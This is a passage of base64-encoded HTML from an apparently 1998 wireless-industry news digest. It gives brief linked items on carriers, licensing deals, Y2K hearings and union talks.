LCANMTk5ODwvRk9OVD48L0ZPTlQ+PC9GT05UPjwvQj48L1REPg0KDQo8VEQ+
PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1REPg0KDQo8VEQ+DQo8SFIg
V0lEVEg9IjU4MCI+PC9URD4NCg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+
DQo8VEQ+PC9URD4NCg0KPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5OLVdlc3QgVXJnZXMgQnJvYWRiYW5kDQpX
aXJlbGVzcyBTdGFuZGFyZHM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPg0KDQo8
VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1REPg0KDQo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgTmF0aW9uYWwgV2lyZWxl
c3MgRWxlY3Ryb25pYyBTeXN0ZW1zDQpUZXN0YmVkIChOLVdlc3QpIHdpbGwg
d29yayB3aXRoIGEgbmV3IEluZHVzdHJ5IFN0YW5kYXJkcyBhbmQgDVRlY2hu
b2xvZ3kNCkNvdW5jaWwgaW5zaWRlIHRoZSBJbnN0aXR1dGUgb2YgRWxlY3Ry
aWNhbCBhbmQgRWxlY3Ryb25pY3MgRW5naW5lZXJzIChJRUVFKQ0KdG8gc3Bl
ZWQgdGhlIGRldmVsb3BtZW50IG9mIHN0YW5kYXJkIGludGVyZmFjZXMgZm9y
IGJyb2FkYmFuZCANd2lyZWxlc3MNCm5ldHdvcmtzLiBUaGUgZ3JvdXAgd2ls
bCB3b3JrIG9uIGNvbW1vbiBzdGFuZGFyZHMgZm9yIExNRFMsIHRoZSBDYW5h
ZGlhbg0KTE1DUywgZnV0dXJlIDM4LUdIeiBtdWx0aXBvaW50IHJhZGlvLCBh
bmQgb3RoZXIgZW1lcmdpbmcgYnJvYWRiYW5kIG5ldHdvcmtzLg0KKDxBIEhS
RUY9Imh0dHA6Ly93d3cudGVjaHdlYi5jb20vd2lyZS9zdG9yeS9UV0IxOTk4
MDgxM1MwMDA3Ij5URUNIV0VCPC9BPik8L0ZPTlQ+PC9URD4NCg0KPFREPjwv
VEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFREPjxCUj48L1RE
Pg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1REPg0KDQo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPlRlbGlnZW50J3MgQ0VPIFNheXMgSGlzDQpDb21wYW55IENhbiBDb21w
ZXRlIHdpdGggdGhlIEdpYW50czwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+DQoN
CjxURD48L1REPg0KPC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRob3VnaCBoaXMgbmV3IGNv
bXBhbnkncyBwZXJmb3JtYW5jZSBzdGlsbA0KbGFncyBjb21wYXJlZCB0byBo
aXMgb2xkIGZpcm0sIEFUJmFtcDtULCBBbGV4IE1hbmRsIGlzIGNvbmZpZGVu
dCB0aGF0IHRoZQ0Kc2l0dWF0aW9uIHdpbGwgc29vbiBjaGFuZ2UuJm5ic3A7
ICg8QSBIUkVGPSJodHRwOi8vd3d3LmNubmZuLmNvbS9ob3RzdG9yaWVzL2Nv
bXBhbmllcy85ODA4LzEzL21hbmRsX2ludHYvIj5DTk48L0E+KTwvRk9OVD48
L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1REPg0K
DQo8VEQ+PEJSPjwvVEQ+DQoNCjxURD48L1REPg0KPC9UUj4NCg0KPFRSPg0K
PFREPjwvVEQ+DQoNCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9KzE+TmV4dGVsIEV4cGFuZHMgTmF0aW9uYWwNCk5l
dHdvcmsgdGhyb3VnaCBBZ3JlZW1lbnQmbmJzcDs8QlI+DQp3aXRoIE5leHRl
bCBQYXJ0bmVycywgSW5jLjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+DQoNCjxU
RD48L1REPg0KPC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPk5leHRlbCBhbm5vdW5jZWQgdGhh
dCBpdCBoYXMgZW50ZXJlZCBhbg0KYWdyZWVtZW50IHdpdGggc2V2ZXJhbCBp
bnZlc3RvcnMsIGluY2x1ZGluZyBNb3Rvcm9sYSwgdG8gZXh0ZW5kIE5leHRl
bCdzDQpVLlMuIHdpcmVsZXNzIHBob25lIG5ldHdvcmsgbmF0aW9ud2lkZS4g
V2hlbiBOZXh0ZWwgcHJvdmlkZWQgaXRzIHNlY29uZC1xdWFydGVyDQpyZXN1
bHRzIGxhc3QgbW9udGgsIGl0IHJldmVhbGVkIHRoYXQgaXQgd291bGQgY29u
dGVtcGxhdGUgaW52ZXN0aW5nIA1pbg0Kb3RoZXIgd2lyZWxlc3MgY29tcGFu
aWVzIHRvIGFpZCBOZXh0ZWwgaW4gZXhwYW5kaW5nIGl0cyBuZXR3b3JrIGFu
ZCBzZWxsaW5nDQpwaG9uZSBzZXJ2aWNlcyB1bmRlciB0aGUgTmV4dGVsIG5h
bWUuICg8QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNvbS9wcm5ld3MvOTgw
ODEzL3ZhX25leHRlbF9fMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+
DQoNCjxURD48L1REPg0KPC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxU
RD48QlI+PC9URD4NCg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+
PC9URD4NCg0KPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5VLlMuIFdpcmVsZXNzIENvcnAuIFNpZ25zDQpDRE1B
IExpY2Vuc2luZyBBZ3JlZW1lbnQmbmJzcDs8QlI+DQp3aXRoIFFVQUxDT01N
PC9GT05UPjwvRk9OVD48L0I+PC9URD4NCg0KPFREPjwvVEQ+DQo8L1RSPg0K
DQo8VFI+DQo8VEQ+PC9URD4NCg0KPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+VS5TLiBXaXJlbGVzcyBoYXMgYW5ub3VuY2VkIGEgbGljZW5z
aW5nDQphZ3JlZW1lbnQgd2l0aCBRVUFMQ09NTSBhbGxvd2luZyBpdCB0byBj
cmVhdGUgYSBDb2RlIERpdmlzaW9uIA1NdWx0aXBsZQ0KQWNjZXNzIChDRE1B
KSB2ZXJzaW9uIGZvciB0aGUgY29tcGFueSdzIFJhZGlvQ2FtZXJhIHdpcmVs
ZXNzIGNhbGxlci1sb2NhdGlvbg0Kc3lzdGVtLiBUaGUgYWdyZWVtZW50IHN0
aXB1bGF0ZXMsIGFjY29yZGluZyB0byBVLlMuIFdpcmVsZXNzLCB0aGF0IFFV
QUxDT01NDQp3aWxsIHN1cHBseSB0aGUgQ0RNQSB0ZWNobm9sb2d5LCB0ZWNo
bmljYWwgYXNzaXN0YW5jZSwgYW5kIGFjY2VzcyB0byBjb21wb25lbnRzDQph
bmQgZXF1aXBtZW50LiBFYWNoIGNvbXBhbnkncyB0ZWNobm9sb2d5IHdpbGwg
YmUgY3Jvc3MtbGljZW5zZWQsIGFsdGhvdWdoDQp0ZXJtcyBhbmQgY29uZGl0
aW9ucyBzdGlsbCBuZWVkIHRvIGJlIG5lZ290aWF0ZWQuIFUuUy4gV2lyZWxl
c3Mgd2lsbCBhY3F1aXJlDQphIGNvbW1lcmNpYWwgbGljZW5zZSBmb3Igd2ly
ZWxlc3MgbG9jYXRpb24gc3lzdGVtcywgd2hpbGUgUVVBTENPTU0gDXdpbGwN
CmdhaW4gYSBjb21tZXJjaWFsIGxpY2Vuc2UgZm9yIGludGVncmF0aW9uIHdp
dGhpbiBpdHMgQ0RNQSBpbmZyYXN0cnVjdHVyZQ0KcHJvZHVjdHMuIFByb3Zp
ZGluZyB3aXJlbGVzcyBjYWxsZXIgbG9jYXRpb24gZGF0YSB0aGF0IHJlaW5m
b3JjZXMgDUUtOTExDQphbmQgb3RoZXIgZW5oYW5jZWQgbW9iaWxlIHNlcnZp
Y2VzLCB0aGUgQU1QUyBtb2RlbCBvZiB0aGUgUmFkaW9DYW1lcmEgd2lsbA0K
cHJvdmlkZSBnZW9sb2NhdGlvbiBkYXRhIGZvciB0aGUgSVMtOTUgQ0RNQSBz
dGFuZGFyZCBhbmQgd2lsbCBiZSANcmVhZHkNCmZvciBvdXRkb29yIGZpZWxk
IHRyaWFscyBieSB0aGUgZW5kIG9mIHRoZSB5ZWFyLiAoPEEgSFJFRj0iaHR0
cDovL2Jpei55YWhvby5jb20vYncvOTgwODEzL3Vfc193aXJlbGVfMS5odG1s
Ij5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+DQoNCjxURD48L1REPg0KPC9UUj4N
Cg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48QlI+PC9URD4NCg0KPFREPjwv
VEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5BIENvbmdy
ZXNzaW9uYWwgWTJLIEJyaWdhZGUNCkhpdHMgdGhlIFJvYWQ8L0ZPTlQ+PC9G
T05UPjwvQj48L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxU
RD48L1REPg0KDQo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5U
aGUgSG91c2UgU3ViY29tbWl0dGVlIG9uIEdvdmVybm1lbnQgTWFuYWdlbWVu
dCwNCkluZm9ybWF0aW9uICZhbXA7IFRlY2hub2xvZ3kgd2lsbCBob2xkIGhl
YXJpbmdzIHNjaGVkdWxlZCBpbiBEYWxsYXMgKEF1Zy4NCjE3KSwgTmV3IE9y
bGVhbnMgKEF1Zy4gMTkpLCBDbGV2ZWxhbmQgKFNlcHQuIDEpLCBJbmRpYW5h
cG9saXMgKFNlcHQuIDIpLA0KYW5kIENoaWNhZ28gKFNlcHQuIDMpLiBUaGUg
c2Vzc2lvbnMgd2lsbCBnaXZlIGxvY2FsIGJ1c2luZXNzIGxlYWRlcnMgYW5k
DQpnb3Zlcm5tZW50IG9mZmljaWFscyBhbiBvcHBvcnR1bml0eSB0byBleHBy
ZXNzIHRoZWlyIGNvbmNlcm5zIGFib3V0IHBvc3NpYmxlDQpZMksgcHJvYmxl
bXMgaW4gaW50ZXJhY3Rpb24gYmV0d2VlbiBsb2NhbCwgc3RhdGUsIGFuZCBm
ZWRlcmFsIA1jb21wdXRlcg0Kc3lzdGVtcy4gKDxBIEhSRUY9Imh0dHA6Ly93
d3cuYnVzaW5lc3N3ZWVrLmNvbS9jZ2ktYmluL2J3ZGFpbHk/cmlnaHQ9ZG5m
bGFzaC9hdWcxOTk4L25mODA4MTJiLmh0bSI+QlVTSU5FU1MNCldFRUsgT05M
SU5FPC9BPik8L0ZPTlQ+PC9URD4NCg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8
VFI+DQo8VEQ+PC9URD4NCg0KPFREPjxCUj48L1REPg0KDQo8VEQ+PC9URD4N
CjwvVFI+DQoNCjxUUj4NCjxURD48L1REPg0KDQo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlRoZXJlIGFyZSBN
b3JlIEdsaXRjaGVzDQpBaGVhZCBBZnRlciBZMks8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1RE
Pg0KDQo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5XaGF0ZXZl
ciBoYXBwZW5zIHdpdGggWTJLLCBvdGhlciBtYWNoaW5lcw0Kd2l0aCBuZXdl
ciwgYnV0IHN0aWxsIHByb2JsZW1hdGljLCBjb2RlIGFyZSBzaWxlbnRseSB0
aWNraW5nIGRvd24gdG8gYW5vdGhlcg0KZGF5LWFuZC1kYXRlIGJ1ZyB0aGF0
IGhhcyBhIGRlYWRsaW5lIGEgbWVyZSBmZXcgZGVjYWRlcyBsYXRlci4gKDxB
IEhSRUY9Imh0dHA6Ly93d3cud2lyZWQuY29tL25ld3MvbmV3cy90ZWNobm9s
b2d5L3N0b3J5LzE0MzkwLmh0bWwiPldJUkVEPC9BPik8L0ZPTlQ+PC9URD4N
Cg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFRE
PjxCUj48L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48
L1REPg0KDQo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPSsxPkludGVySmV0TmV0IENvcnAuIEludHJvZHVjZXMNCldp
cmVsZXNzIEludGVybmV0IEFjY2VzcyZuYnNwOzxCUj4NCnRvIE9yYW5nZSBD
b3VudHksIENhbGlmb3JuaWE8L0ZPTlQ+PC9GT05UPjwvQj48L1REPg0KDQo8
VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1REPg0KDQo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgY29tcGFueSB3aWxsIGZp
cnN0IGJyaW5nIGl0cyBzZXJ2aWNlcw0KdG8gSXJ2aW5lLCBDYWxpZm9ybmlh
IGJlY2F1c2Ugb2YgdGhlIHJlZ2lvbidzIHVuaXF1ZSBtYXJrZXQgb3Bwb3J0
dW5pdGllcy4NClRoZSBJcnZpbmUgYXJlYSBpcyByYXBpZGx5IGdyb3dpbmcs
IGVzcGVjaWFsbHkgaW4gdGhlIGJ1c2luZXNzIHNlY3Rvci4mbmJzcDsNCklu
dGVySmV0TmV0IGFscmVhZHkgcHJvdmlkZXMgd2lyZWxlc3MgSW50ZXJuZXQg
YWNjZXNzIGluIFNhbHQgTGFrZSBDaXR5LA0KVXRhaCwgSG91c3RvbiBhbmQg
QmVhdW1vbnQsIFRleGFzLiZuYnNwOyBBZnRlciBPcmFuZ2UgQ291bnR5LCB0
aGUgY29tcGFueQ0KcGxhbnMgdG8gZXhwYW5kIHRocm91Z2hvdXQgdGhlIExv
cyBBbmdlbGVzIG1ldHJvIHJlZ2lvbiwgYW5kIGFzIGZhciBzb3V0aA0KYXMg
dGhlIE1leGljYW4gYm9yZGVyLiBBZnRlciBmdWxsIGNvdmVyYWdlIG9mIHNv
dXRoZXJuIENhbGlmb3JuaWEsIA1JSk5UDQppbnRlbmRzIHRvIGNvbXBsZXRl
IGl0cyBDYWxpZm9ybmlhIGV4cGFuc2lvbiBieSBleHRlbmRpbmcgaW50byB0
aGUgDVNhbg0KRnJhbmNpc2NvIEJheSBhcmVhIGFuZCB0aGUgbm9ydGhlcm4g
cmVnaW9uIG9mIHRoZSBzdGF0ZS4mbmJzcDsgKDxBIEhSRUY9Imh0dHA6Ly9i
aXoueWFob28uY29tL2J3Lzk4MDgxMy9pbnRlcmpldG5lXzEuaHRtbCI+WUFI
T088L0E+KTwvRk9OVD48L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxU
Uj4NCjxURD48L1REPg0KDQo8VEQ+PEJSPjwvVEQ+DQoNCjxURD48L1REPg0K
PC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48Qj48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+QmVsbFNvdXRoIFdp
cmVsZXNzIERhdGENCmFuZCBUcmFuc2FjdGlvbiBOZXR3b3JrIFNlcnZpY2Vz
Jm5ic3A7PEJSPg0KdG8gT2ZmZXIgU2luZ2xlIENhcnJpZXIgRWxlY3Ryb25p
YyBUcmFuc2FjdGlvbiBQcm9jZXNzaW5nJm5ic3A7PC9GT05UPjwvRk9OVD48
L0I+PC9URD4NCg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9U
RD4NCg0KPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QnVzaW5l
c3NlcyBjYW4gcHJvY2VzcyBjcmVkaXQvZGViaXQgY2FyZA0KdHJhbnNhY3Rp
b25zIHdpcmVsZXNzbHkgdGhyb3VnaG91dCB0aGUgY291bnRyeSwgd2l0aG91
dCBjb21wbGljYXRlZCByZS1yZWdpc3RyYXRpb24sDQpyb2FtaW5nLCBwaG9u
ZSBsaW5lcyBvciBlbGVjdHJpY2FsIG91dGxldHMuICg8QSBIUkVGPSJodHRw
Oi8vYml6LnlhaG9vLmNvbS9wcm5ld3MvOTgwODEzL2NhX2JlbGxzb3VfMS5o
dG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+DQoNCjxURD48L1REPg0KPC9U
Uj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48QlI+PC9URD4NCg0KPFRE
PjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFREPjxCPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5UZWxl
Q29ycCBTZWxlY3RzIFBsYW5ldCZyZWc7DQpTb2Z0d2FyZSBMaWNlbnNlcyBm
cm9tIE1TSSZuYnNwOzxCUj4NCnRvIEhlbHAgUGxhbiBhbmQgRGVzaWduIERp
Z2l0YWwgV2lyZWxlc3MgTmV0d29yayBpbiBVLlMuJm5ic3A7PC9GT05UPjwv
Rk9OVD48L0I+PC9URD4NCg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8
VEQ+PC9URD4NCg0KPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
TW9iaWxlIFN5c3RlbXMgSW50ZXJuYXRpb25hbCBBbWVyaWNhcw0KaGFzIHNv
bGQgZWlnaHQgUGxhbmV0JnJlZzsgbmV0d29yayBkZXNpZ24gc29mdHdhcmUg
YW5kIHNlcnZpY2UgDWxpY2Vuc2VzDQp0byBUZWxlQ29ycCwgZm9yIHVzZSBp
biBidWlsZGluZyBvdXQgaXRzIFUuUy4gUGVyc29uYWwgQ29tbXVuaWNhdGlv
bnMgU2VydmljZXMNCihQQ1MpIG5ldHdvcmsuJm5ic3A7IFRlbGVDb3JwIGlz
IG9uZSBvZiBBVCZhbXA7VCBXaXJlbGVzcycgYWZmaWxpYXRlcyB3aXRoDQox
MW1pbGxpb24gUE9QUyBpbiBsYXJnZWx5IHVyYmFuIG1hcmtldHMuIFRlbGVD
b3JwIHdpbGwgYnVpbGQgYW5kIG9wZXJhdGUNCmRpZ2l0YWwgd2lyZWxlc3Mg
bmV0d29ya3MgaW4gTmV3IE9ybGVhbnMsIExBOyBNZW1waGlzLCBUTjsgTGl0
dGxlIA1Sb2NrLA0KQVI7IGFuZCBpbiBhcmVhcyBzdXJyb3VuZGluZyBCb3N0
b24sIE1BIGFuZCBTdC4gTG91aXMsIE1PLiZuYnNwOyAoPEEgSFJFRj0iaHR0
cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Npb25hbC9uZXdz
L2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zMTgzIj5XT1ctQ09NPC9BPik8
L0ZPTlQ+PC9URD4NCg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+
PC9URD4NCg0KPFREPjxCUj48L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoN
CjxUUj4NCjxURD48L1REPg0KDQo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkJyaXRpc2ggUmFpbHdheSB0byBC
bG9jaw0KVXNlIG9mIFdpcmVsZXNzIFBob25lczwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+DQoNCjxURD48L1REPg0KPC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+
DQoNCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNoaWx0ZXJu
IFJhaWx3YXlzIG9mIEJyaXRhaW4sIGluIHJlc3BvbnNlDQp0byBjdXN0b21l
cnMnIGNvbXBsYWludHMgYWJvdXQgbG91ZCBjZWxsIHBob25lIHVzZXJzLCBp
cyBwbGFubmluZyB0byBpbnN0YWxsDQphIHNwZWNpYWwgbWV0YWwtY29hdGlu
ZyBvbiBnbGFzcyB3aW5kb3dzIHRoYXQgcHJldmVudHMgcmFkaW8gd2F2ZXMg
DWZyb20NCnBhc3NpbmcgdGhyb3VnaCBpbiBpdHMgY2FycmlhZ2VzLiZuYnNw
OyAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3By
b2Zlc3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zMTg0
Ij5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4NCg0KPFREPjwvVEQ+DQo8L1RS
Pg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFREPjxCUj48L1REPg0KDQo8VEQ+
PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1REPg0KDQo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkJDRSBJ
bmMuIFNlZWtzIFBhcnRuZXINCmZvciBHbG9iYWwgVGVsZWNvbSBEYW5jZTwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+DQoNCjxURD48L1REPg0KPC9UUj4NCg0K
PFRSPg0KPFREPjwvVEQ+DQoNCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPkJDRSBJbmMuLCBhIGdpYW50IGluIENhbmFkYSdzIHRlbGVjb21t
dW5pY2F0aW9ucw0KaW5kdXN0cnksIGhhcyBiZWVuIGluIHRhbGtzIHdpdGgg
YSBudW1iZXIgb2YgZGlmZmVyZW50IHBhcnRpZXMgc2luY2UgdGhlDQpzdGFy
dCBvZiB0aGUgeWVhci4gVGhlcmUgYXJlIGEgbnVtYmVyIG9mIGRpZmZlcmVu
dCB0eXBlcyBvZiBkZWFscyBCQ0UgY291bGQNCmNvbnNpZGVyIC0tIGEgbG9v
c2UgYWxsaWFuY2UsIGEgam9pbnQgdmVudHVyZSBvciBhbiBvdXRyaWdodCBt
ZXJnZXIgDS0tDQpidXQgYW5hbHlzdHMgd291bGQgbGlrZSB0byBzZWUgYW4g
YWdyZWVtZW50IHRoYXQgaW52b2x2ZXMgcmVhbCBtb25leS4gKDxBIEhSRUY9
Imh0dHA6Ly9iaXoueWFob28uY29tL2ZpbmFuY2UvOTgwODEzL2NhbmFkYV9i
Y2VfMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+DQoNCjxURD48L1RE
Pg0KPC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48QlI+PC9URD4N
Cg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFRE
PjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0r
MT5TYXRlbGxpdGUgU2VydmljZSBDb3VsZA0KUHJvdmUgRWNvbm9taWMgQm9v
c3QgZm9yIExhdGluIEFtZXJpY2E8L0ZPTlQ+PC9GT05UPjwvQj48L1REPg0K
DQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1REPg0KDQo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5DdXJyZW50bHksIExhdGlu
IEFtZXJpY2FuIGJ1c2luZXNzZXMgaGF2ZQ0KdHJvdWJsZSBjb25uZWN0aW5n
IHRvIHdvcmtpbmcgcGhvbmUgbGluZXMsIGFuZCBvZnRlbiBlbXBsb3kgbXVs
dGlwbGUgcGhvbmVzDQpvbiBkZXNrdG9wcyB0byBpbXByb3ZlIHRoZWlyIG9k
ZHMuIEJ1dCBhcyBwcml2YXRpemF0aW9uIGJyZWFrcyB1cCB0cmFkaXRpb25h
bA0KZ292ZXJubWVudCBtb25vcG9saWVzLCBMYXRpbiBBbWVyaWNhbiBjb3Vu
dHJpZXMgYXJlIGZpbmRpbmcgdGhleSBoYXZlIGFjY2Vzcw0KdG8gc2F0ZWxs
aXRlIHN5c3RlbXMgaW5zdGVhZCBvZiBydW5kb3duIHRlbGVwaG9uZSBwb2xl
cyBhbmQgbGltaXRlZCBsaW5lcy4mbmJzcDsNCig8QSBIUkVGPSJodHRwOi8v
d3d3LndpcmVkLmNvbS9uZXdzL25ld3MvdGVjaG5vbG9neS9zdG9yeS8xNDQy
MC5odG1sIj5XSVJFRDwvQT4pPC9GT05UPjwvVEQ+DQoNCjxURD48L1REPg0K
PC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48QlI+PC9URD4NCg0K
PFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5V
IFMgV0VTVCBBc2tzIGZvciBNZWRpYXRvcidzDQpIZWxwIGluIENvbnRlbnRp
b3VzIFVuaW9uIFRhbGtzPC9GT05UPjwvRk9OVD48L0I+PC9URD4NCg0KPFRE
PjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIG5lZ290aWF0aW9ucywgY2hh
cmFjdGVyaXplZCBieSB1bmlvbg0KcmVwcmVzZW50YXRpdmVzIGFzIHNvbWUg
b2YgdGhlIG1vc3QgZGlmZmljdWx0IGluIHRoZSBpbmR1c3RyeSwgYm9nZ2Vk
IGRvd24NCm92ZXIgaXNzdWVzIHN1Y2ggYXMgZm9yY2VkIG92ZXJ0aW1lLCBz
Y2hlZHVsaW5nIGFuZCBhIHVuaXF1ZSBVIFMgV0VTVCBwZXJmb3JtYW5jZS1w
YXkNCnBsYW4uICg8QSBIUkVGPSJodHRwOi8vd3d3LmZveG1hcmtldHdpcmUu
Y29tL3dpcmVzLzA4MTMvZl9hcF8wODEzXzM4LnNtbCI+Rk9YDQpORVdTPC9B
PikgLSAoPEEgSFJFRj0iaHR0cDovL3d3dy5kZW52ZXJwb3N0LmNvbS9idXNp
bmVzcy9iaXowODE0Lmh0bSI+REVOVkVSDQpQT1NUPC9BPik8L0ZPTlQ+PC9U
RD4NCg0KPFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0K
PFREPjxCUj48L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxU
RD48L1REPg0KDQo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPk5vIEpvYiBBY3Rpb24gYWdhaW5zdA0KU05FVCBi
eSBVbmlvbjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+DQoNCjxURD48L1REPg0K
PC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPlNvdXRoZXJuIE5ldyBFbmdsYW5kIFRlbGVjb21t
dW5pY2F0aW9ucw0KaGFzIGV4dGVuZGVkIGEgdW5pb24gY29udHJhY3QgdGhy
b3VnaCBBdWcuIDIyLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5ib3N0b24uY29t
L2RhaWx5bmV3cy93aXJlaHRtbC8yMjUvTm9fam9iX2FjdGlvbl9ieV9waG9u
ZV9jb21wYW55X3VuaW8uc2h0bWwiPkJPU1RPTg0KR0xPQkU8L0E+KTwvRk9O
VD48L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoNCjxUUj4NCjxURD48L1RE
Pg0KDQo8VEQ+DQo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+DQoNCjxURD48L1RE
Pg0KPC9UUj4NCg0KPFRSPg0KPFREPjwvVEQ+DQoNCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Rm9yIGFkZGl0aW9u
YWwgbmV3cyBhYm91dA0KdGhlIHdpcmVsZXNzIGluZHVzdHJ5LS1pbmNsdWRp
bmcgcGVyaW9kaWMgbmV3cyB1cGRhdGVzIHRocm91Z2hvdXQgdGhlIGRheS0t
dmlzaXQNCjxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0dHA6
Ly93d3cud293LWNvbS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4NCg0K
PFREPjwvVEQ+DQo8L1RSPg0KDQo8VFI+DQo8VEQ+PC9URD4NCg0KPFREPg0K
